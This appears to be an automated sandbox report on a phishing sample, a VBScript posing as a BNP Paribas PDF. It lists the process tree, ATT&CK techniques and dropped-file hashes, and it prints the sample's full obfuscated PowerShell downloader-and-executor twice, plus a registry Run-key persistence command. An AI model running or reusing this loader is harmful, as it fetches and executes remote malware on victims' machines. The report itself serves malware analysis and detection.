  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=760,i,8620317850510188419,9894328495597859175,262144 --variations-seed-version --mojo-platform-channel-handle=6276 /prefetch:8
  2⤵
  PID:4832
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5520,i,8620317850510188419,9894328495597859175,262144 --variations-seed-version --mojo-platform-channel-handle=6744 /prefetch:8
  2⤵
  PID:4200
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=5724,i,8620317850510188419,9894328495597859175,262144 --variations-seed-version --mojo-platform-channel-handle=6228 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5464
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6732,i,8620317850510188419,9894328495597859175,262144 --variations-seed-version --mojo-platform-channel-handle=5996 /prefetch:8
  2⤵
  PID:1964

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:3224

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:4016

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:2660
- C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
  "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\Downloads\BNPParibaspdf.7z"
  2⤵
  - System Location Discovery: System Language Discovery
  - Checks processor information in registry
  - Modifies Internet Explorer settings
  - Suspicious use of SetWindowsHookEx
  PID:5516
- - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5852
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=504FC40446967EB9F00A61721B0E7754 --mojo-platform-channel-handle=1744 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
      4⤵
      System Location Discovery: System Language Discovery
      PID:5992
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=44C37127784705C0774F04BF35EA3FA8 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=44C37127784705C0774F04BF35EA3FA8 --renderer-client-id=2 --mojo-platform-channel-handle=1768 --allow-no-sandbox-job /prefetch:1
      4⤵
      System Location Discovery: System Language Discovery
      PID:6008
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=AEA64F38FD1418021F2DD468C0DB1F10 --mojo-platform-channel-handle=2320 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
      4⤵
      System Location Discovery: System Language Discovery
      PID:2204
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=17DB214566D9DFD7565E91B889C83CCB --mojo-platform-channel-handle=1976 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
      4⤵
      System Location Discovery: System Language Discovery
      PID:3220
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=A09AABE30501DDD765FD9F9336EAF786 --mojo-platform-channel-handle=2348 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
      4⤵
      System Location Discovery: System Language Discovery
      PID:5312

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:632

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\BNPParibaspdf.7z"
1⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:5248
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\7zO084EAD78\BNPParibas,pdf.vbs"
  2⤵
  - Blocklisted process makes network request
  - Checks computer location settings
  PID:1396
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Get-Service;$Smaaskndes='func';Get-History;$Smaaskndes+='t';Get-History;$Smaaskndes+='i';$Bogladepriser=Get-History;$Smaaskndes+='on:';$Bogladepriser=Get-History;(ni -p $Smaaskndes -n Meandrite -value { param($Caponummeret);$Triumferes=1;do {$Urovarslingers+=$Caponummeret[$Triumferes];$Triumferes+=2} until(!$Caponummeret[$Triumferes])$Urovarslingers});(ni -p $Smaaskndes -n Comaens -value {param($Collapsar);.($Negroes) ($Collapsar)});ConvertTo-Html;$Mosen=Meandrite ' NFE,tK..W';$Mosen+=Meandrite 'PE bBCUlNICEun t';$Skrumples=Meandrite ' M onzJiAlLlMaA/';$Kasinoets=Meandrite 'FT lMsE1 2';$Apurpose=' [PnTeOtH.DsKE r V i CUeFPAO I.NTtSmBA nAAAGLeOrF]G:D: sAE c u,r iCtSyCpRRMO,T,o cSOMl =T$PKCA SHi nCOUE TRs';$Skrumples+=Meandrite ' 5O..0 (IW i nSdSo w sO AN T 1,0..K0 ;U WPiDnK6,4 ;B CxF6 4 ;D .r,v :T1W3N4 .S0R). ,GKeTcUk o,/E2D0 1 0 0C1 0,1 F iHrAeDf o.x,/ 1 3T4H.P0';$Undecyl=Meandrite 'Eu s,eCRp- aDgTesNPT';$Pickery=Meandrite ' h tHtSp sK: / /Sw.wCw . tEr.a nMsGp.a.r.eUnMcFiBaCq uViSl lAoNtUa.. cFlO/ RSiCt,h eS.RmPs i';$Foreknowledges=Meandrite ' >';$Negroes=Meandrite ' iBEKX';$Besnakkedes='Eure';$Shindig='\Svulsterne.Cau';Comaens (Meandrite 'S$ G L O b a l : dARHnU= $,E N V : AAPFP,D ARTDA +D$SSJhSiSn d,IGG');Comaens (Meandrite ' $ GSl OMBIAbL :GaFBCO nFN,eAMPECn t SKOWm R A AKD eDT.=A$ PBIWc k eLrDy .AS.p L iSt,( $JfPo rPE,k N.O.w lEEDd G.e sF)');Comaens (Meandrite $Apurpose);$Pickery=$abonnementsomraadet[0];$Diphyes=(Meandrite ' $FgLL o bSaUL.:VhIuMNSdSe sPL D.EPrMNUeDsF=DN eAw -Doyb jfetC tD HSNyPs.TSESmZ.O$LMUO sPE n');Comaens ($Diphyes);Comaens (Meandrite 'V$,H uFnPd eHsDl dGeBrNnBe sH. HPeSa d,eOr sR[S$RU nSd eRcBy,l ]U= $HS kBr,u.m,pPlSeTs');$Materializee=Meandrite 'FD o wLnWlUo a dTF i lne';$Planck=Meandrite 'U$RHnuInDd eGs lEdWe rLnIe,sF. $KM a t e,rPiBaTl i.z e e .NIHn vFo kPe (Y$PP iRc.kHe r,yA,O$.sSaTa s.)';$saas=$Drn;Comaens (Meandrite 'B$FgSlUO BJA lD: NLO nLoLBFSHE rTVFaKtSIFOSN,=D(TtFE.SSTa-NPHA T H $ s AEA sB)');while (!$Nonobservation) {Comaens (Meandrite 'S$ gGl.oWbFaFl :SO tfo n e uSr o lAoMgHyX=E$,U.dGf,aBlSd sFvIiPn kcl e rUn e s') ;Comaens $Planck;Comaens (Meandrite 't[ t HLrSeEACd,IBN g . t H rTE a dM].:H:,SDLPeREPPG(.4 0 0B0K)');Comaens (Meandrite ' $,gAlSoTb A lN:.N OCNRo b S E R.VVA Tsi oKn =v( tGeKs td- p a TRH P$LS aIA SB)') ;Comaens (Meandrite 'A$PGBlAODBhaML :UogvDEfr S TBR EAG = $SgOl oGB a lz: B R n D E h u,gRgreNR NMEV+u+E%S$ ASb.OAnLn ESmLePNUT s OBm rBAKa,d ERT .Pc O,u NDT') ;$Pickery=$abonnementsomraadet[$Overstreg]}$Fibrocartilaginous=384348;$Brnebegrnsnings=27779;Comaens (Meandrite ' $ GSlmOJB,A Ls: E,u cDh a.R iDS t,i CAaTlFlQYV H= gTE T.- C ODN ttETn,TV B$ sSA.A,s');Comaens (Meandrite 'H$AgFlBoEbHa l :UTBj rUnSeT =G [,S ySsMt eLmC. C ojnUv eSrPt ] : :LFUr oAm,BVa,s eN6U4 S tRr i,n,gt(d$ E uIc h,aVr iSsGt i c a.lGl y )');Comaens (Meandrite 'B$ g LIo B a l : g uIN sDtCi.g e.rSe T=. T[SS.Y sMTREHM..LtUESx T .iE N cHoTd iUnUg,]E:.:Ea,S cMI,iS.Ug.E T S t RKISNHg (.$,TUJ R n E )');Comaens (Meandrite 'S$ gSLSO,bSA l :OWSoNr KNYK= $PG UbNPs.T I g e r EG.Es U b.s T r iONMGO(S$Tf IBb.rSoMcAA rSTdIUlKa.g iKn OMu s ,S$KBarBnPeIb e g RSn s.N i nTg S,)');Comaens $Worky;"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5732

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Get-Service;$Smaaskndes='func';Get-History;$Smaaskndes+='t';Get-History;$Smaaskndes+='i';$Bogladepriser=Get-History;$Smaaskndes+='on:';$Bogladepriser=Get-History;(ni -p $Smaaskndes -n Meandrite -value { param($Caponummeret);$Triumferes=1;do {$Urovarslingers+=$Caponummeret[$Triumferes];$Triumferes+=2} until(!$Caponummeret[$Triumferes])$Urovarslingers});(ni -p $Smaaskndes -n Comaens -value {param($Collapsar);.($Negroes) ($Collapsar)});ConvertTo-Html;$Mosen=Meandrite ' NFE,tK..W';$Mosen+=Meandrite 'PE bBCUlNICEun t';$Skrumples=Meandrite ' M onzJiAlLlMaA/';$Kasinoets=Meandrite 'FT lMsE1 2';$Apurpose=' [PnTeOtH.DsKE r V i CUeFPAO I.NTtSmBA nAAAGLeOrF]G:D: sAE c u,r iCtSyCpRRMO,T,o cSOMl =T$PKCA SHi nCOUE TRs';$Skrumples+=Meandrite ' 5O..0 (IW i nSdSo w sO AN T 1,0..K0 ;U WPiDnK6,4 ;B CxF6 4 ;D .r,v :T1W3N4 .S0R). ,GKeTcUk o,/E2D0 1 0 0C1 0,1 F iHrAeDf o.x,/ 1 3T4H.P0';$Undecyl=Meandrite 'Eu s,eCRp- aDgTesNPT';$Pickery=Meandrite ' h tHtSp sK: / /Sw.wCw . tEr.a nMsGp.a.r.eUnMcFiBaCq uViSl lAoNtUa.. cFlO/ RSiCt,h eS.RmPs i';$Foreknowledges=Meandrite ' >';$Negroes=Meandrite ' iBEKX';$Besnakkedes='Eure';$Shindig='\Svulsterne.Cau';Comaens (Meandrite 'S$ G L O b a l : dARHnU= $,E N V : AAPFP,D ARTDA +D$SSJhSiSn d,IGG');Comaens (Meandrite ' $ GSl OMBIAbL :GaFBCO nFN,eAMPECn t SKOWm R A AKD eDT.=A$ PBIWc k eLrDy .AS.p L iSt,( $JfPo rPE,k N.O.w lEEDd G.e sF)');Comaens (Meandrite $Apurpose);$Pickery=$abonnementsomraadet[0];$Diphyes=(Meandrite ' $FgLL o bSaUL.:VhIuMNSdSe sPL D.EPrMNUeDsF=DN eAw -Doyb jfetC tD HSNyPs.TSESmZ.O$LMUO sPE n');Comaens ($Diphyes);Comaens (Meandrite 'V$,H uFnPd eHsDl dGeBrNnBe sH. HPeSa d,eOr sR[S$RU nSd eRcBy,l ]U= $HS kBr,u.m,pPlSeTs');$Materializee=Meandrite 'FD o wLnWlUo a dTF i lne';$Planck=Meandrite 'U$RHnuInDd eGs lEdWe rLnIe,sF. $KM a t e,rPiBaTl i.z e e .NIHn vFo kPe (Y$PP iRc.kHe r,yA,O$.sSaTa s.)';$saas=$Drn;Comaens (Meandrite 'B$FgSlUO BJA lD: NLO nLoLBFSHE rTVFaKtSIFOSN,=D(TtFE.SSTa-NPHA T H $ s AEA sB)');while (!$Nonobservation) {Comaens (Meandrite 'S$ gGl.oWbFaFl :SO tfo n e uSr o lAoMgHyX=E$,U.dGf,aBlSd sFvIiPn kcl e rUn e s') ;Comaens $Planck;Comaens (Meandrite 't[ t HLrSeEACd,IBN g . t H rTE a dM].:H:,SDLPeREPPG(.4 0 0B0K)');Comaens (Meandrite ' $,gAlSoTb A lN:.N OCNRo b S E R.VVA Tsi oKn =v( tGeKs td- p a TRH P$LS aIA SB)') ;Comaens (Meandrite 'A$PGBlAODBhaML :UogvDEfr S TBR EAG = $SgOl oGB a lz: B R n D E h u,gRgreNR NMEV+u+E%S$ ASb.OAnLn ESmLePNUT s OBm rBAKa,d ERT .Pc O,u NDT') ;$Pickery=$abonnementsomraadet[$Overstreg]}$Fibrocartilaginous=384348;$Brnebegrnsnings=27779;Comaens (Meandrite ' $ GSlmOJB,A Ls: E,u cDh a.R iDS t,i CAaTlFlQYV H= gTE T.- C ODN ttETn,TV B$ sSA.A,s');Comaens (Meandrite 'H$AgFlBoEbHa l :UTBj rUnSeT =G [,S ySsMt eLmC. C ojnUv eSrPt ] : :LFUr oAm,BVa,s eN6U4 S tRr i,n,gt(d$ E uIc h,aVr iSsGt i c a.lGl y )');Comaens (Meandrite 'B$ g LIo B a l : g uIN sDtCi.g e.rSe T=. T[SS.Y sMTREHM..LtUESx T .iE N cHoTd iUnUg,]E:.:Ea,S cMI,iS.Ug.E T S t RKISNHg (.$,TUJ R n E )');Comaens (Meandrite 'S$ gSLSO,bSA l :OWSoNr KNYK= $PG UbNPs.T I g e r EG.Es U b.s T r iONMGO(S$Tf IBb.rSoMcAA rSTdIUlKa.g iKn OMu s ,S$KBarBnPeIb e g RSn s.N i nTg S,)');Comaens $Worky;"
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
PID:2260
- C:\Windows\SysWOW64\msiexec.exe
  "C:\Windows\SysWOW64\msiexec.exe"
  2⤵
  - Blocklisted process makes network request
  - Suspicious use of NtCreateThreadExHideFromDebugger
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  PID:2892
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Jorddag" /t REG_EXPAND_SZ /d "%Rdlg% -windowstyle 1 $Skbnefllesskab=(gi 'HKCU:\Software\Unglowering\').GetValue('Rawlplug');%Rdlg% ($Skbnefllesskab)"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5664
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Jorddag" /t REG_EXPAND_SZ /d "%Rdlg% -windowstyle 1 $Skbnefllesskab=(gi 'HKCU:\Software\Unglowering\').GetValue('Rawlplug');%Rdlg% ($Skbnefllesskab)"
      4⤵
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      PID:1908

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\chrome_Unpacker_BeginUnzipping1052_1594381566\manifest.json

Filesize
160B

MD5
a24a1941bbb8d90784f5ef76712002f5

SHA1
5c2b6323c7ed8913b5d0d65a4d21062c96df24eb

SHA256
2a7fe18a087d8e8be847d9569420b6e8907917ff6ca0fa42be15d4e3653c8747

SHA512
fd7dfec3d46b2af0bddb5aaeae79467507e0c29bab814007a39ea61231e76123659f18a453ed3feb25f16652a0c63c33545e2a0d419fafea89f563fca6a07ce2

Download Submit
C:\Program Files\chrome_Unpacker_BeginUnzipping1052_1873409767\manifest.json

Filesize
43B

MD5
af3a9104ca46f35bb5f6123d89c25966

SHA1
1ffb1b0aa9f44bdbc57bdf4b98d26d3be0207ee8

SHA256
81bd82ac27612a58be30a72dd8956b13f883e32ffb54a58076bd6a42b8afaeea

SHA512
6a7a543fa2d1ead3574b4897d2fc714bb218c60a04a70a7e92ecfd2ea59d67028f91b6a2094313f606560087336c619093f1d38d66a3c63a1d1d235ca03d36d1

Download Submit
C:\Program Files\chrome_Unpacker_BeginUnzipping1052_204678622\manifest.json

Filesize
160B

MD5
c3911ceb35539db42e5654bdd60ac956

SHA1
71be0751e5fc583b119730dbceb2c723f2389f6c

SHA256
31952875f8bb2e71f49231c95349945ffc0c1dd975f06309a0d138f002cfd23d

SHA512
d8b2c7c5b7105a6f0c4bc9c79c05b1202bc8deb90e60a037fec59429c04fc688a745ee1a0d06a8311466b4d14e2921dfb4476104432178c01df1e99deb48b331

Download Submit
C:\Program Files\chrome_Unpacker_BeginUnzipping1052_819464736\manifest.json

Filesize
134B

MD5
049c307f30407da557545d34db8ced16

SHA1
f10b86ebfe8d30d0dc36210939ca7fa7a819d494

SHA256
c36944790c4a1fa2f2acec5f7809a4d6689ecb7fb3b2f19c831c9adb4e17fc54

SHA512
14f04e768956bdd9634f6a172104f2b630e2eeada2f73b9a249be2ec707f4a47ff60f2f700005ca95addd838db9438ad560e5136a10ed32df1d304d65f445780

Download Submit
C:\ProgramData\remcos\logs.dat

Filesize
144B

MD5
4269a0982a930e576f040e080378dd70

SHA1
54f9e28f65242ec03df7e3b165e10d3fa520811f

SHA256
5e0a55c761703c5727e385a1095a9dc0ecbfad00c78e921820831bcd5d81154e

SHA512
81140cc49147360e2a223b8a15e9cd2763b54040ef16f548cc793da670a861d5c76d67684a73b96837521f514372b1180e1ffaf07292ade27e15690b167e82f2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\AutoLaunchProtocolsComponent\1.0.0.9\protocols.json

Filesize
3KB

MD5
f9fd82b572ef4ce41a3d1075acc52d22

SHA1
fdded5eef95391be440cc15f84ded0480c0141e3

SHA256
5f21978e992a53ebd9c138cb5391c481def7769e3525c586a8a94f276b3cd8d6

SHA512
17084cc74462310a608355fbeafa8b51f295fb5fd067dfc641e752e69b1ee4ffba0e9eafa263aab67daab780b9b6be370dd3b54dd4ba8426ab499e50ff5c7339

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
280B

MD5
0db1d88802048ff847bfcf47035335bd

SHA1
bb54059e5b145da464f6521ae67353889ce00771

SHA256
416525d2bfeaeab0950175c0eab55ad35e84518ef5299f10565023800788cf9a

SHA512
32c5b42febdb38c3a30eb5179b8aa20a5e731b0e83aab16ec73d27b4108bfc89eb6316f71a988388cb5df19267ba823f6d0220fab5584667ba0adb0da1152a30

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
280B

MD5
8734b4a181214bb62f91cfa36c7e2c98

SHA1
9cff323f10778a23d73ac3dcffc038d3bf661b78

SHA256
e06afe980fa56c8dad3e7c6b8d0d8f1e7eb9a4860ac715e966026fb7631c3ba5

SHA512
e8648a54da9aa24b6cba1f0377a0ce33979ea097554bb6347f252cad894ad4134e1fe839abc80eb48e2510061d5c6937e80374d32f95afd4cc8567b57694ac36

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
3KB

MD5
e71baf6ae67ffdab6f34a14ca99778a7

SHA1
d43783295867e0722f0caed44f92672a250e08e3

SHA256
84441d6d247d6d36fe70b48c43b599eb8cc0df22f5841864ec32c1f2b8805949

SHA512
df35e4ca7377e4ea151ba540c99fecd5b5213b29536018582adcc3d5946bba941a65feba729731310129a8da7859e13653c5ff4f18f7f35b1a3f50a74959988e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index~RFe57f58b.TMP

Filesize
3KB

MD5
7eeae1d43c1d3ecc6249dc744b7e62ee

SHA1
af2fe2df28e38c516a22bfe7d13b89727754d7ea

SHA256
2254c6aa4e36c6658516d5bacd908e8121ea7caedf9b4f227e26f5c667d7042a

SHA512
7681b2807d0af55d2787f4cdadbf7b55a50e722e31070e5504e4514bb3ae69016ce2ff7e140f9c2a7092e0923d87565d891cc78d8022271f4277e8230fee0754

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico

Filesize
69KB

MD5
164a788f50529fc93a6077e50675c617

SHA1
c53f6cd0531fd98d6abbd2a9e5fbb4319b221f48

SHA256
b305e470fb9f8b69a8cd53b5a8ffb88538c9f6a9c7c2c194a226e8f6c9b53c17

SHA512
ec7d173b55283f3e59a468a0037921dc4e1bf3fab1c693330b9d8e5826273c917b374c4b802f3234bbb5e5e210d55e52351426867e0eb8c9f6fba1a053cb05d4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.1_0\content.js

Filesize
9KB

MD5
3d20584f7f6c8eac79e17cca4207fb79

SHA1
3c16dcc27ae52431c8cdd92fbaab0341524d3092

SHA256
0d40a5153cb66b5bde64906ca3ae750494098f68ad0b4d091256939eea243643

SHA512
315d1b4cc2e70c72d7eb7d51e0f304f6e64ac13ae301fd2e46d585243a6c936b2ad35a0964745d291ae9b317c316a29760b9b9782c88cc6a68599db531f87d59

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

Filesize
111B

MD5
285252a2f6327d41eab203dc2f402c67

SHA1
acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6

SHA256
5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026

SHA512
11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

Filesize
2KB

MD5
23fda6d169e9064890e84ecf47e17ff1

SHA1
